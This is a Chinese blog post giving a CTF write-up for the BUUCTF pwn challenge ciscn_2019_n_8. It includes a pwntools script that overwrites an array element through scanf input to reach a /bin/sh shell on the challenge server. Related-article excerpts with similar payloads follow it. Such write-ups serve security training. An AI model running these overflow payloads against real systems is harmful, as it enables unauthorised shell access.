[buuctf]ciscn_2019_n_8

最新推荐文章于 2024-07-05 00:19:02 发布
最新推荐文章于 2024-07-05 00:19:02 发布
阅读量455 收藏 1
点赞数
分类专栏: PWN # buuctf 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71081503/article/details/125357930
版权
buuctf 同时被 2 个专栏收录
32 篇文章 0 订阅
订阅专栏
PWN
30 篇文章 2 订阅
订阅专栏
本文介绍了通过ida进行逆向工程分析,发现程序逻辑,在全保护开启的情况下,构造特定payload实现条件跳转到/bin/sh,从而获得flag。最终提供的python脚本展示了如何构造并发送payload。
摘要由CSDN通过智能技术生成

ciscn_2019_n_8

解析

先checksec一下,发现保护全开。
在这里插入图片描述
稍微有些迷茫,之后拖入ida中查看,发现逻辑是这样的。
在这里插入图片描述
要存在这个var13的值,之后要这个值等于17的情况下,会跳转到/bin/sh所以大概懂了,如果想要前面要填充0-13的var,那么需要a * (13*4)个之后加一个17之后因为是qword,所以需要在后面用0填一下,所以脚本大概成型。

脚本

from pwn import *
context(os = 'linux',arch = 'i386',log_level = 'debug')
p = remote('node4.buuoj.cn',28239)
#p = process('ciscn_2019_n_8')
payload = b'a' * (13*4) + p32(17) + p32(0)
p.recv()
p.sendline(payload)
p.interactive()

最后flag是flag{40a7b09f-a57d-4812-b888-d22d623b59c3}

逆向萌新
关注
专栏目录
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 560
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
ciscn_2019_n_8题解
OrientalGlass的博客
01-08 261
是以&var[13]为起始地址的八个内存单元,由于是小端存储,所以覆盖要使得v[13]=0,v[14]=17。很显然输入字符串覆盖var数组里的值满足要求即可。1.checksec查看,保护全开感觉不妙。3.程序逻辑并不复杂,脚本很简单。2.ida打开查看程序。
ciscn_2019_n_8
xieyichensss的博客
04-07 503
最近做题好少啊,感觉堆好难啊。 废话不多说了,这是我做过的挺简单的一个题了。 1.拿到文件,直接file,发现保护基本全开,心里一凉,然后拖入ida。 2.发现是个很简单的栈溢出,如果var数组的第14个参数为0x11,即可调用system(’/bin/sh’)。 而又有scanf函数,且第一个参数为var数组的首地址。 3.exp from pwn import * context.os=‘linux’ context.arch=‘i386’ context.log_level=‘debug’ #sla=
BUUCTF-PWN】9-ciscn_2019_n_8
最新发布
燕麦葡萄干的博客
07-05 326
4 + p32(17) #qword/IDA在32位里面是4个字节,在64位是/8个字节。不属于栈溢出,应该是比较简单的pwn,看懂代码逻辑+使用pwntools。32位,开启了Stack、NX、PIE保护。即当var数组的第十四个元素是17就可以。
ciscn_2019_n_8【BUUCTF
qq_41696518的博客
08-26 357
ciscn_2019_n_8
ctf【ciscn_2019_n_8】
HUANGliang_的博客
10-29 275
缓冲区溢出漏洞
ciscn_2019_n_8 buuctf
XDiku的博客
01-21 667
ciscn_2019_n_8
[BUUCTF-pwn]——ciscn_2019_n_8
Y_peak的博客
02-10 2029
[BUUCTF-pwn]——ciscn_2019_n_8 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_8 题目 上去checksec一下,吓一跳保护基本全开了。 在IDA中一看,开心了。如此简单 只需要v[13] ==17 就好。因为var是以字符串的形式输入的。所以exploit如下: exploit from pwn import * p = remote("node3.buuoj.cn",29772) p.sendline("aaaa"*13 +
BUUCTF ciscn_2019_n_8
红叶的博客
10-31 265
一道通过Checksec让没看源代码的你觉得难度很高的题。
BUUCTF - PWN】ciscn_2019_n_8
古月浪子的博客
03-27 1149
checksec一下,好叭全开 IDA打开看看,var是int数组,如果var[13]=0x11的话就能get flag from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' sla=lambda x,y:io.sendlin...
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 631
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
BUUCTFciscn_2019_n_1 1
qq_41560595的博客
09-24 4384
这道题是栈溢出题型,又不同于一般的栈溢出,在此做个总结。 查看权限 拖入IDA,F5可用函数 解题思路:这道题的意思是输入字符串v1,判断v2。考虑输入长字符串覆盖到存储v2的内存空间,把v2的值改掉。 因此,覆盖0x30-0x4=44个字节给v1,另外4个字节给v2 由于v2数值在内存中以16进制存储,所以,找到11.28125的16进制值。 存在两个比较指令,双击进去。 0x41348000就是16进制的11.28125。 编写脚本 from pwn import * p=remote('
BUUCTF栈迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1032
1.checksec+运行获取基本信息 32位+NX堆栈不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规栈溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
BUUCTF pwn ciscn_2019_n_8
菜的只能随便写写博客
02-03 2622
0x01 文件分析  文件很简单,32位,保护都开得差不多。   0x02 运行  输入并且回显。   0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...
Buuctf(pwn)ciscn_2019_n_8
半岛铁盒的博客
03-28 239
保护开的挺全; from pwn import* r=remote('node3.buuoj.cn',28155) payload = p32(17)*14 r.sendline(payload) r.interactive() 没利用漏洞,简单的输入满足条件就好了
buuctfciscn_2019_n_8
weixin_54452942的博客
04-12 523
两个方法解题
buuctf ciscn_2019_n_8
carol2358的博客
04-15 276
ida: 直接有sh,只要让var[13]等于17就可以 exp: from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvl...
buuctf luky_guy
09-28
Luky库是一组抽象复杂操作的Java类,它提供了各种功能,包括网络...根据提供的引用内容,无法直接了解到buuctf luky_guy的具体信息。如果您能提供更多关于buuctf luky_guy的背景信息,我可以尝试为您提供更准确的答案。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

逆向萌新

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值